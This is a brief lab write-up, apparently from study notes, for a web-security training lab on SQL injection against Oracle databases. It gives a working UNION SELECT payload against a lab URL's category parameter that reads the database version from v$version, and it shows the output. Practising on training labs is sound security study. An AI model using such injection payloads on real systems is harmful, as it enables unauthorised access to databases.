Lab: SQL injection attack, querying the database type and version on Oracle
Like previous challenges
Get the NO. of columns
Get the data types of columns

https://acdd1f9a1e5c5569c0b33f07004600ee.web-security-academy.net/filter?category=Accessories' UNION SELECT banner, 'def' FROM v$version-- -
CORE 11.2.0.2.0 Production
PreviousLab: SQL injection UNION attack, retrieving multiple values in a single columnNextLab: SQL injection attack, querying the database type and version on MySQL and Microsoft
Last updated